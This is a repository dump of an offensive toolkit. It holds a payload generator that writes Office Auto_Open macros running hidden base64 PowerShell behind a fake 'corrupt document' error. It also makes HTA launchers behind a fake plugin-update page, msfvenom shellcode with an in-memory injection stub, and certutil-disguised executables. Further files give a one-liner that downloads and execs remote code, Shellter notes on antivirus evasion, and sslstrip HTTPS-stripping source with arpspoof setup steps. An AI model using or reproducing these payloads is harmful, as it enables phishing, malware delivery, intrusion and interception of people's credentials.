macro_str = "Sub Auto_Open()\nDim x\nx = " 220 | 221 | if line_length is None: 222 | line_length_int = 380 223 | else: 224 | line_length_int = int(line_length) 225 | 226 | powershell_command_list = split_str(full_attack, line_length_int) 227 | 228 | for line in powershell_command_list: 229 | macro_str += "& \"" + line + "\" _\n" 230 | 231 | # remove trailing "_ \r\n" 232 | macro_str = macro_str[:-4] 233 | # remove first occurrence of & 234 | macro_str = macro_str.replace("& ", "", 1) 235 | 236 | # end of macro 237 | macro_str += """"\nShell ("POWERSHELL.EXE " & x)\nDim title As String\ntitle = "Critical Microsoft Office Error"\nDim msg As String\nDim intResponse As Integer\nmsg = "This document appears to be corrupt or missing critical rows in order to restore. Please restore this file from a backup."\nintResponse = MsgBox(msg, 16, title)\nApplication.Quit\nEnd Sub""" 238 | return macro_str 239 | 240 | 241 | # generate Matthew Graeber's (Matt rocks) attack for binary to cert format - https://gist.github.com/mattifestation/47f9e8a431f96a266522 242 | def gen_cert_attack(filename): 243 | if os.path.isfile(filename): 244 | # make sure the directory is made 245 | if not os.path.isdir("decode_attack"): 246 | os.makedirs("decode_attack") 247 | 248 | # remove old files here 249 | if os.path.isfile("decode_attack/encoded_attack.crt"): 250 | os.remove("decode_attack/encoded_attack.crt") 251 | 252 | print "[*] Importing in binary file to base64 encode it for certutil prep." 253 | data = file(filename, "rb").read() 254 | data = base64.b64encode(data) 255 | print "[*] Writing out the file to decode_attack/encoded_attack.crt" 256 | write_file("decode_attack/encoded_attack.crt", 257 | "-----BEGIN CERTIFICATE-----\n{0}\n-----END CERTIFICATE-----".format(data)) 258 | print "[*] Filewrite complete, writing out decode string for you.." 
259 | write_file("decode_attack/decode_command.bat", "certutil -decode encoded_attack.crt encoded.exe") 260 | print "[*] Exported attack under decode_attack/" 261 | print "[*] There are two files, encoded_attack.crt contains your encoded data" 262 | print "[*] The second file, decode_command.bat will decode the cert to an executable." 263 | else: 264 | print "[!] File was not found. Exiting the unicorn attack." 265 | sys.exit() 266 | 267 | # generate HTA attack method 268 | 269 | 270 | def gen_hta_attack(command): 271 | # HTA code here 272 | main1 = """""" % command 273 | main2 = """outdated plugin
Please wait redirecting to download...
""" 274 | 275 | # make a directory if its not there 276 | if not os.path.isdir("hta_attack"): os.makedirs("hta_attack") 277 | 278 | # write out index file 279 | print "[*] Writing out index file to hta_attack/index.html" 280 | write_file("hta_attack/index.html", main2) 281 | 282 | # write out Launcher.hta 283 | print "[*] Writing malicious hta launcher hta_attack/Launcher.hta" 284 | write_file("hta_attack/Launcher.hta", main1) 285 | 286 | 287 | # generate the actual shellcode through msf 288 | def generate_shellcode(payload, ipaddr, port): 289 | print "[*] Generating the payload shellcode.. This could take a few seconds/minutes as we create the shellcode..." 290 | port = port.replace("LPORT=", "") 291 | proc = subprocess.Popen( 292 | "msfvenom -p %s LHOST=%s LPORT=%s StagerURILength=5 StagerVerifySSLCert=false -e x86/shikata_ga_nai -a x86 --platform windows --smallest -f c" % ( 293 | payload, ipaddr, port), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) 294 | data = proc.communicate()[0] 295 | # start to format this a bit to get it ready 296 | repls = {';': '', ' ': '', '+': '', '"': '', '\n': '', 'buf=': '', 'Found 0 compatible encoders': '', 297 | 'unsignedcharbuf[]=': ''} 298 | data = reduce(lambda a, kv: a.replace(*kv), repls.iteritems(), data).rstrip() 299 | return data 300 | 301 | 302 | # generate shellcode attack and replace hex 303 | def gen_shellcode_attack(payload, ipaddr, port): 304 | # regular payload generation stuff 305 | # generate our shellcode first 306 | shellcode = generate_shellcode(payload, ipaddr, port).rstrip() 307 | # sub in \x for 0x 308 | shellcode = re.sub("\\\\x", "0x", shellcode) 309 | # base counter 310 | counter = 0 311 | # count every four characters then trigger floater and write out data 312 | floater = "" 313 | # ultimate string 314 | newdata = "" 315 | for line in shellcode: 316 | floater += line 317 | counter += 1 318 | if counter == 4: 319 | newdata = newdata + floater + "," 320 | floater = "" 321 | counter = 0 322 
| 323 | # here's our shellcode prepped and ready to go 324 | shellcode = newdata[:-1] 325 | 326 | # write out rc file 327 | write_file("unicorn.rc", 328 | "use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nset EnableStageEncoding true\nexploit -j\n" % ( 329 | payload, ipaddr, port)) 330 | 331 | # one line shellcode injection with native x86 shellcode 332 | powershell_code = ( 333 | r"""$1 = '$c = ''[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$w = Add-Type -memberDefinition $c -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = %s;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$x=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};';$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));$2 = "-enc ";if([IntPtr]::Size -eq 8){$3 = $env:SystemRoot + "\syswow64\WindowsPowerShell\v1.0\powershell";iex "& $3 $2 $e"}else{;iex "& powershell $2 $e";}""" % shellcode) 334 | return powershell_code 335 | 336 | 337 | def gen_ps1_attack(ps1path): 338 | if os.path.isfile(ps1path): 339 | with open(ps1path, 'r') as scriptfile: 340 | data = scriptfile.read() 341 | return data 342 | else: 343 | print "[!] {0} does not exist. 
Please check your path".format(ps1path) 344 | sys.exit(1) 345 | 346 | 347 | def format_payload(powershell_code, attack_type, attack_modifier, option): 348 | gen_unicorn() 349 | print "Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)" 350 | print "Twitter: @TrustedSec, @HackingDave" 351 | print "\nHappy Magic Unicorns." 352 | 353 | full_attack = "powershell -window hidden -enc " + base64.b64encode(powershell_code.encode('utf_16_le')) 354 | 355 | if attack_type == "msf": 356 | if attack_modifier == "macro": 357 | macro_attack = generate_macro(full_attack) 358 | write_file("powershell_attack.txt", macro_attack) 359 | macro_help() 360 | 361 | elif attack_modifier == "hta": 362 | gen_hta_attack(full_attack) 363 | shutil.move("unicorn.rc", "hta_attack/") # move unicorn to hta attack if hta specified 364 | hta_help() 365 | 366 | else: # write out powershell attacks 367 | write_file("powershell_attack.txt", full_attack) 368 | ps_help() 369 | 370 | elif attack_type == "custom_ps1": 371 | if attack_modifier == "macro": 372 | macro_attack = generate_macro(full_attack, option) 373 | write_file("powershell_attack.txt", macro_attack) 374 | else: 375 | write_file("powershell_attack.txt", full_attack) 376 | 377 | custom_ps1_help() 378 | 379 | else: 380 | write_file("powershell_attack.txt", full_attack) 381 | ps_help() 382 | 383 | # Print completion messages 384 | if attack_type == "msf" and attack_modifier == "hta": 385 | print "[*] Exported index.html, Launcher.hta, and unicorn.rc under hta_attack/." 386 | print "[*] Run msfconosle -r unicorn.rc to launch listener and move index and launcher to web server.\n" 387 | 388 | elif attack_type == "msf": 389 | print "[*] Exported powershell output code to powershell_attack.txt." 390 | print "[*] Exported Metasploit RC file as unicorn.rc. 
Run msfconsole -r unicorn.rc to execute and create listener.\n" 391 | 392 | elif attack_type == "custom_ps1": 393 | print "[*] Exported powershell output code to powershell_attack.txt" 394 | 395 | 396 | # pull the variables needed for usage 397 | try: 398 | attack_type = "" 399 | attack_modifier = "" 400 | payload = "" 401 | ps1path = "" 402 | 403 | if len(sys.argv) > 1: 404 | if sys.argv[1] == "--help": 405 | ps_help() 406 | macro_help() 407 | hta_help() 408 | cert_help() 409 | custom_ps1_help() 410 | gen_usage() 411 | sys.exit() 412 | else: 413 | if len(sys.argv) > 2 and sys.argv[2] == "crt": 414 | attack_type = "crt" 415 | payload = sys.argv[1] 416 | elif re.search('\.ps1$', sys.argv[1]) is not None: 417 | attack_type = "custom_ps1" 418 | ps1path = sys.argv[1] 419 | else: 420 | attack_type = "msf" 421 | payload = sys.argv[1] 422 | 423 | # if we are using macros 424 | if len(sys.argv) == 5: 425 | if attack_type == "msf": # msf macro attack 426 | ipaddr = sys.argv[2] 427 | port = sys.argv[3] 428 | attack_modifier = sys.argv[4] 429 | ps = gen_shellcode_attack(payload, ipaddr, port) 430 | else: 431 | print "[!] Options not understood or missing. Use --help switch for assistance." 432 | sys.exit(1) 433 | 434 | format_payload(ps, attack_type, attack_modifier, None) 435 | 436 | # default unicorn & custom ps1 macro attacks 437 | elif len(sys.argv) == 4: 438 | if attack_type == "custom_ps1": # custom ps1 macro attack 439 | attack_modifier = sys.argv[2] 440 | option = sys.argv[3] 441 | ps = gen_ps1_attack(ps1path) 442 | elif attack_type == "msf": 443 | payload = sys.argv[1] 444 | ipaddr = sys.argv[2] 445 | port = sys.argv[3] 446 | attack_modifier = "" 447 | option = None 448 | ps = gen_shellcode_attack(payload, ipaddr, port) 449 | # It should not be possible to get here, but just in case it does for some reason in the future, it will 450 | # prevent usage of 'ps' and 'option', causing the app to crash 451 | else: 452 | print "[!] 
Something went way wrong while generating payload." 453 | sys.exit() 454 | 455 | format_payload(ps, attack_type, attack_modifier, option) 456 | 457 | elif len(sys.argv) == 3: 458 | # Matthews base64 cert attack 459 | if attack_type == "crt": 460 | cert_help() 461 | # generate the attack vector 462 | gen_cert_attack(payload) 463 | elif attack_type == "custom_ps1": 464 | attack_modifier = sys.argv[2] 465 | ps = gen_ps1_attack(ps1path) 466 | format_payload(ps, attack_type, attack_modifier, None) 467 | else: 468 | print "[!] Options not understood or missing. Use --help switch for assistance." 469 | sys.exit() 470 | 471 | elif len(sys.argv) == 2: 472 | if attack_type == "custom_ps1": 473 | ps = gen_ps1_attack(ps1path) 474 | format_payload(ps, attack_type, None, None) 475 | else: 476 | print "[!] Options not understood or missing. Use --help switch for assistance." 477 | sys.exit() 478 | 479 | # if we did supply parameters 480 | elif len(sys.argv) < 2: 481 | gen_unicorn() 482 | gen_usage() 483 | 484 | except Exception, e: 485 | print "[!] Something went wrong, printing the error: " + str(e) 486 | 487 | -------------------------------------------------------------------------------- /modules/update.txt: -------------------------------------------------------------------------------- 1 | 4.6 2 | -------------------------------------------------------------------------------- /modules/web_delivery.bat: -------------------------------------------------------------------------------- 1 | :: COPY/PASTE THE COMMAND PROVIDED BY 'web_delivery' MSF MODULE, and delete this line befor saving the file/close document... 
2 | 3 | -------------------------------------------------------------------------------- /modules/web_delivery.py: -------------------------------------------------------------------------------- 1 | python -c "import urllib2; r = urllib2.urlopen('http://SRVHOST:8080/a'); exec(r.read());" 2 | -------------------------------------------------------------------------------- /priv8/.set: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/priv8/.set -------------------------------------------------------------------------------- /priv8/handler/.set: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/priv8/handler/.set -------------------------------------------------------------------------------- /shellter/faq.txt: -------------------------------------------------------------------------------- 1 | 2 | 1) Does the execution flow return to normal after executing the payload? 3 | ========================================================================= 4 | 5 | Shellter V (v5.0) introduces the Stealth Mode feature which preserves the 6 | original functionality of the application while it keeps all the benefits 7 | of dynamic PE infection. 8 | 9 | As mentioned also below, when you use the Stealth Mode feature you need to 10 | set the payload exit function to 'Thread', when you prepare the multi-handler 11 | listener in metasploit, otherwise the process will be terminated when you kill 12 | the session. 13 | 14 | For more information on how to use Stealth Mode effectively, please read the 15 | readme.txt document. 16 | 17 | 18 | 19 | 2) Does the process die after the payload is executed? 20 | ======================================================= 21 | 22 | This actually depends on how the payload behaves. 
23 | 24 | If you use the Stealth Mode feature, then you must always set the exit 25 | function for the payload to 'Thread' so that it won't kill the process 26 | when it returns. In this case the process will still run. 27 | 28 | If you don't use the Stealth Mode feature, then if the exit function is 29 | set to 'Process', the payload will kill the process, otherwise the program 30 | will most probably crash. 31 | Keep in mind that this will happen after the execution of the payload, or 32 | after killing the reverse connection, so in any case this doesn't affect 33 | the effectiveness of the injected code. 34 | 35 | For more information on how to use Stealth Mode effectively, please read the 36 | readme.txt document. 37 | 38 | 39 | 40 | 3) How long does it take to execute the payload? 41 | ================================================= 42 | 43 | Normally, this happens instantly, unless you have injected into a point in 44 | the execution flow that requires user interaction with the application in order 45 | to be reached. 46 | 47 | Furthermore, when junk polymorphic code is used then this delays the execution 48 | of the payload. In Stealth Mode the delay is not significant. 49 | However, when Stealth Mode is not used the execution of the effective payload 50 | can be delayed by several seconds. 51 | 52 | This delay is good in order to bypass AV emulation engines and sandboxes that 53 | normally only monitor the process for a limited time. You don't have to use 54 | this feature if you don't want to. However, it can significantly contribute 55 | towards AV evasion. 
-------------------------------------------------------------------------------- /shellter/icon/shellter.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/shellter/icon/shellter.ico -------------------------------------------------------------------------------- /shellter/license.txt: -------------------------------------------------------------------------------- 1 | License Agreement 2 | ==================== 3 | 4 | By using this software you understand that it has been exclusively developed 5 | by Kyriakos Economou (@kyREcon) during his free time and his past, current or 6 | future employers may assume no prior knowledge of existence for it. 7 | 8 | This software makes use of the BeaEngine Disassemble library 9 | (http://www.beaengine.org) as stated in the readme.txt file. 10 | 11 | 12 | This license was updated the 18th of May 2015. 13 | 14 | 15 | 16 | 17 | Terms of Use 18 | ============== 19 | 20 | 21 | 1) You can use this software and share it with anyone as long as you do this 22 | for free. 23 | 24 | 2) You assume full responsibility for any damage caused by this software either 25 | this applies to you or to someone else. 26 | 27 | 3) You assume full responsibility for any unlawful actions taken by using this 28 | software. 29 | 30 | 4) You are allowed to modify this software, but if you do then you have to 31 | explicitly state so in case you share it with other people. 32 | 33 | 5) You are allowed to reverse engineer it, disassemble it, debug it, for any 34 | reason that might be, but in case you find a bug then please report it to 35 | the author and give him the necessary amount of time to fix it before 36 | disclosing it. 37 | 38 | 6) You are allowed to distribute this software from your own website, but if 39 | you do then you have to include a link to its original source along with 40 | the license agreement. 
41 | 42 | 7) You are allowed to use this software for work purposes, but you are not 43 | allowed to charge for it. 44 | This means that you have the right to use it as a complementary tool to 45 | assist you at work, but you are not allowed to build a commercial service 46 | based on this tool or exploit this tool financially by any means without 47 | the written agreement of its author. 48 | 49 | 8) You are not allowed to use this software to gain unauthorized access to a 50 | computer system or network without a written agreement of its owner. 51 | 52 | 9) It is responsibility of the user to check for any modifications in this 53 | license agreement, and adjust the way he is using this software accordingly. 54 | 55 | 10) You are allowed to use this software for as long as you want only if you 56 | respect all the previous terms. 57 | 58 | 59 | Good luck! 60 | 61 | kyREcon -------------------------------------------------------------------------------- /shellter/shellcode_samples/calc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/shellter/shellcode_samples/calc -------------------------------------------------------------------------------- /shellter/shellcode_samples/calcenc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/shellter/shellcode_samples/calcenc -------------------------------------------------------------------------------- /shellter/shellcode_samples/info.txt: -------------------------------------------------------------------------------- 1 | These are set to kill the process after execution, so don't use them to evaluate Stealth Mode. 
2 | 3 | 4 | calc: Launch Calc.exe - No Encoding 5 | 6 | calcenc : Launch Calc.exe - Custom Encoding 7 | 8 | krb1: Launch Calc.exe - Metasploit Single Encoding 9 | 10 | krb3 : Launch Calc.exe - Metasploit Triple Encoding -------------------------------------------------------------------------------- /shellter/shellcode_samples/krb1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/shellter/shellcode_samples/krb1 -------------------------------------------------------------------------------- /shellter/shellcode_samples/krb3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/shellter/shellcode_samples/krb3 -------------------------------------------------------------------------------- /shellter/shellter.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/shellter/shellter.exe -------------------------------------------------------------------------------- /sslstrip-0.9/README: -------------------------------------------------------------------------------- 1 | sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping 2 | attacks. 3 | 4 | It requires Python 2.5 or newer, along with the 'twisted' python module. 5 | 6 | Installing: 7 | * Unpack: tar zxvf sslstrip-0.5.tar.gz 8 | * Install twisted: sudo apt-get install python-twisted-web 9 | * (Optionally) run 'python setup.py install' as root to install, 10 | or you can just run it out of the directory. 11 | 12 | Running: 13 | sslstrip can be run from the source base without installation. 14 | Just run 'python sslstrip.py -h' as a non-root user to get the 15 | command-line options. 
16 | 17 | The four steps to getting this working (assuming you're running Linux) 18 | are: 19 | 20 | 1) Flip your machine into forwarding mode (as root): 21 | echo "1" > /proc/sys/net/ipv4/ip_forward 22 | 23 | 2) Setup iptables to intercept HTTP requests (as root): 24 | iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 25 | 26 | 3) Run sslstrip with the command-line options you'd like (see above). 27 | 28 | 4) Run arpspoof to redirect traffic to your machine (as root): 29 | arpspoof -i -t 30 | 31 | More Info: 32 | http://www.thoughtcrime.org/software/sslstrip/ 33 | -------------------------------------------------------------------------------- /sslstrip-0.9/lock.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/sslstrip-0.9/lock.ico -------------------------------------------------------------------------------- /sslstrip-0.9/setup.py: -------------------------------------------------------------------------------- 1 | import sys, os, shutil 2 | from distutils.core import setup, Extension 3 | 4 | 5 | shutil.copyfile("sslstrip.py", "sslstrip/sslstrip") 6 | 7 | setup (name = 'sslstrip', 8 | version = '0.9', 9 | description = 'A MITM tool that implements Moxie Marlinspike\'s HTTPS stripping attacks.', 10 | author = 'Moxie Marlinspike', 11 | author_email = 'moxie@thoughtcrime.org', 12 | url = 'http://www.thoughtcrime.org/software/sslstrip/', 13 | license = 'GPL', 14 | packages = ["sslstrip"], 15 | package_dir = {'sslstrip' : 'sslstrip/'}, 16 | scripts = ['sslstrip/sslstrip'], 17 | data_files = [('share/sslstrip', ['README', 'COPYING', 'lock.ico'])], 18 | ) 19 | 20 | print "Cleaning up..." 
21 | try: 22 | removeall("build/") 23 | os.rmdir("build/") 24 | except: 25 | pass 26 | 27 | try: 28 | os.remove("sslstrip/sslstrip") 29 | except: 30 | pass 31 | 32 | def capture(cmd): 33 | return os.popen(cmd).read().strip() 34 | 35 | def removeall(path): 36 | if not os.path.isdir(path): 37 | return 38 | 39 | files=os.listdir(path) 40 | 41 | for x in files: 42 | fullpath=os.path.join(path, x) 43 | if os.path.isfile(fullpath): 44 | f=os.remove 45 | rmgeneric(fullpath, f) 46 | elif os.path.isdir(fullpath): 47 | removeall(fullpath) 48 | f=os.rmdir 49 | rmgeneric(fullpath, f) 50 | 51 | def rmgeneric(path, __func__): 52 | try: 53 | __func__(path) 54 | except OSError, (errno, strerror): 55 | pass 56 | -------------------------------------------------------------------------------- /sslstrip-0.9/sslstrip.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping attacks.""" 4 | 5 | __author__ = "Moxie Marlinspike" 6 | __email__ = "moxie@thoughtcrime.org" 7 | __license__= """ 8 | Copyright (c) 2004-2009 Moxie Marlinspike 9 | 10 | This program is free software; you can redistribute it and/or 11 | modify it under the terms of the GNU General Public License as 12 | published by the Free Software Foundation; either version 3 of the 13 | License, or (at your option) any later version. 14 | 15 | This program is distributed in the hope that it will be useful, but 16 | WITHOUT ANY WARRANTY; without even the implied warranty of 17 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 18 | General Public License for more details. 
19 | 20 | You should have received a copy of the GNU General Public License 21 | along with this program; if not, write to the Free Software 22 | Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 23 | USA 24 | 25 | """ 26 | 27 | from twisted.web import http 28 | from twisted.internet import reactor 29 | 30 | from sslstrip.StrippingProxy import StrippingProxy 31 | from sslstrip.URLMonitor import URLMonitor 32 | from sslstrip.CookieCleaner import CookieCleaner 33 | 34 | import sys, getopt, logging, traceback, string, os 35 | 36 | gVersion = "0.9" 37 | 38 | def usage(): 39 | print "\nsslstrip " + gVersion + " by Moxie Marlinspike" 40 | print "Usage: sslstrip \n" 41 | print "Options:" 42 | print "-w , --write= Specify file to log to (optional)." 43 | print "-p , --post Log only SSL POSTs. (default)" 44 | print "-s , --ssl Log all SSL traffic to and from server." 45 | print "-a , --all Log all SSL and HTTP traffic to and from server." 46 | print "-l , --listen= Port to listen on (default 10000)." 47 | print "-f , --favicon Substitute a lock favicon on secure requests." 48 | print "-k , --killsessions Kill sessions in progress." 49 | print "-h Print this help message." 
50 | print "" 51 | 52 | def parseOptions(argv): 53 | logFile = 'sslstrip.log' 54 | logLevel = logging.WARNING 55 | listenPort = 10000 56 | spoofFavicon = False 57 | killSessions = False 58 | 59 | try: 60 | opts, args = getopt.getopt(argv, "hw:l:psafk", 61 | ["help", "write=", "post", "ssl", "all", "listen=", 62 | "favicon", "killsessions"]) 63 | 64 | for opt, arg in opts: 65 | if opt in ("-h", "--help"): 66 | usage() 67 | sys.exit() 68 | elif opt in ("-w", "--write"): 69 | logFile = arg 70 | elif opt in ("-p", "--post"): 71 | logLevel = logging.WARNING 72 | elif opt in ("-s", "--ssl"): 73 | logLevel = logging.INFO 74 | elif opt in ("-a", "--all"): 75 | logLevel = logging.DEBUG 76 | elif opt in ("-l", "--listen"): 77 | listenPort = arg 78 | elif opt in ("-f", "--favicon"): 79 | spoofFavicon = True 80 | elif opt in ("-k", "--killsessions"): 81 | killSessions = True 82 | 83 | return (logFile, logLevel, listenPort, spoofFavicon, killSessions) 84 | 85 | except getopt.GetoptError: 86 | usage() 87 | sys.exit(2) 88 | 89 | def main(argv): 90 | (logFile, logLevel, listenPort, spoofFavicon, killSessions) = parseOptions(argv) 91 | 92 | logging.basicConfig(level=logLevel, format='%(asctime)s %(message)s', 93 | filename=logFile, filemode='w') 94 | 95 | URLMonitor.getInstance().setFaviconSpoofing(spoofFavicon) 96 | CookieCleaner.getInstance().setEnabled(killSessions) 97 | 98 | strippingFactory = http.HTTPFactory(timeout=10) 99 | strippingFactory.protocol = StrippingProxy 100 | 101 | reactor.listenTCP(int(listenPort), strippingFactory) 102 | 103 | print "\nsslstrip " + gVersion + " by Moxie Marlinspike running..." 
104 | 105 | reactor.run() 106 | 107 | if __name__ == '__main__': 108 | main(sys.argv[1:]) 109 | -------------------------------------------------------------------------------- /sslstrip-0.9/sslstrip/ClientRequest.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2009 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA 17 | # 18 | 19 | import urlparse, logging, os, sys, random 20 | 21 | from twisted.web.http import Request 22 | from twisted.web.http import HTTPChannel 23 | from twisted.web.http import HTTPClient 24 | 25 | from twisted.internet import ssl 26 | from twisted.internet import defer 27 | from twisted.internet import reactor 28 | from twisted.internet.protocol import ClientFactory 29 | 30 | from ServerConnectionFactory import ServerConnectionFactory 31 | from ServerConnection import ServerConnection 32 | from SSLServerConnection import SSLServerConnection 33 | from URLMonitor import URLMonitor 34 | from CookieCleaner import CookieCleaner 35 | from DnsCache import DnsCache 36 | 37 | class ClientRequest(Request): 38 | 39 | ''' This class represents incoming client requests and is essentially where 40 | the magic begins. 
Here we remove the client headers we dont like, and then 41 | respond with either favicon spoofing, session denial, or proxy through HTTP 42 | or SSL to the server. 43 | ''' 44 | 45 | def __init__(self, channel, queued, reactor=reactor): 46 | Request.__init__(self, channel, queued) 47 | self.reactor = reactor 48 | self.urlMonitor = URLMonitor.getInstance() 49 | self.cookieCleaner = CookieCleaner.getInstance() 50 | self.dnsCache = DnsCache.getInstance() 51 | # self.uniqueId = random.randint(0, 10000) 52 | 53 | def cleanHeaders(self): 54 | headers = self.getAllHeaders().copy() 55 | 56 | if 'accept-encoding' in headers: 57 | del headers['accept-encoding'] 58 | 59 | if 'if-modified-since' in headers: 60 | del headers['if-modified-since'] 61 | 62 | if 'cache-control' in headers: 63 | del headers['cache-control'] 64 | 65 | return headers 66 | 67 | def getPathFromUri(self): 68 | if (self.uri.find("http://") == 0): 69 | index = self.uri.find('/', 7) 70 | return self.uri[index:] 71 | 72 | return self.uri 73 | 74 | def getPathToLockIcon(self): 75 | if os.path.exists("lock.ico"): return "lock.ico" 76 | 77 | scriptPath = os.path.abspath(os.path.dirname(sys.argv[0])) 78 | scriptPath = os.path.join(scriptPath, "../share/sslstrip/lock.ico") 79 | 80 | if os.path.exists(scriptPath): return scriptPath 81 | 82 | logging.warning("Error: Could not find lock.ico") 83 | return "lock.ico" 84 | 85 | def handleHostResolvedSuccess(self, address): 86 | logging.debug("Resolved host successfully: %s -> %s" % (self.getHeader('host'), address)) 87 | host = self.getHeader("host") 88 | headers = self.cleanHeaders() 89 | client = self.getClientIP() 90 | path = self.getPathFromUri() 91 | 92 | self.content.seek(0,0) 93 | postData = self.content.read() 94 | url = 'http://' + host + path 95 | 96 | self.dnsCache.cacheResolution(host, address) 97 | 98 | if (not self.cookieCleaner.isClean(self.method, client, host, headers)): 99 | logging.debug("Sending expired cookies...") 100 | 
self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client, 101 | host, headers, path)) 102 | elif (self.urlMonitor.isSecureFavicon(client, path)): 103 | logging.debug("Sending spoofed favicon response...") 104 | self.sendSpoofedFaviconResponse() 105 | elif (self.urlMonitor.isSecureLink(client, url)): 106 | logging.debug("Sending request via SSL...") 107 | self.proxyViaSSL(address, self.method, path, postData, headers, 108 | self.urlMonitor.getSecurePort(client, url)) 109 | else: 110 | logging.debug("Sending request via HTTP...") 111 | self.proxyViaHTTP(address, self.method, path, postData, headers) 112 | 113 | def handleHostResolvedError(self, error): 114 | logging.warning("Host resolution error: " + str(error)) 115 | self.finish() 116 | 117 | def resolveHost(self, host): 118 | address = self.dnsCache.getCachedAddress(host) 119 | 120 | if address != None: 121 | logging.debug("Host cached.") 122 | return defer.succeed(address) 123 | else: 124 | logging.debug("Host not cached.") 125 | return reactor.resolve(host) 126 | 127 | def process(self): 128 | logging.debug("Resolving host: %s" % (self.getHeader('host'))) 129 | host = self.getHeader('host') 130 | deferred = self.resolveHost(host) 131 | 132 | deferred.addCallback(self.handleHostResolvedSuccess) 133 | deferred.addErrback(self.handleHostResolvedError) 134 | 135 | def proxyViaHTTP(self, host, method, path, postData, headers): 136 | connectionFactory = ServerConnectionFactory(method, path, postData, headers, self) 137 | connectionFactory.protocol = ServerConnection 138 | self.reactor.connectTCP(host, 80, connectionFactory) 139 | 140 | def proxyViaSSL(self, host, method, path, postData, headers, port): 141 | clientContextFactory = ssl.ClientContextFactory() 142 | connectionFactory = ServerConnectionFactory(method, path, postData, headers, self) 143 | connectionFactory.protocol = SSLServerConnection 144 | self.reactor.connectSSL(host, port, connectionFactory, clientContextFactory) 145 
| 146 | def sendExpiredCookies(self, host, path, expireHeaders): 147 | self.setResponseCode(302, "Moved") 148 | self.setHeader("Connection", "close") 149 | self.setHeader("Location", "http://" + host + path) 150 | 151 | for header in expireHeaders: 152 | self.setHeader("Set-Cookie", header) 153 | 154 | self.finish() 155 | 156 | def sendSpoofedFaviconResponse(self): 157 | icoFile = open(self.getPathToLockIcon()) 158 | 159 | self.setResponseCode(200, "OK") 160 | self.setHeader("Content-type", "image/x-icon") 161 | self.write(icoFile.read()) 162 | 163 | icoFile.close() 164 | self.finish() 165 | -------------------------------------------------------------------------------- /sslstrip-0.9/sslstrip/ClientRequest.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/sslstrip-0.9/sslstrip/ClientRequest.pyc -------------------------------------------------------------------------------- /sslstrip-0.9/sslstrip/CookieCleaner.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2004-2011 Moxie Marlinspike 2 | # 3 | # This program is free software; you can redistribute it and/or 4 | # modify it under the terms of the GNU General Public License as 5 | # published by the Free Software Foundation; either version 3 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, but 9 | # WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 11 | # General Public License for more details. 
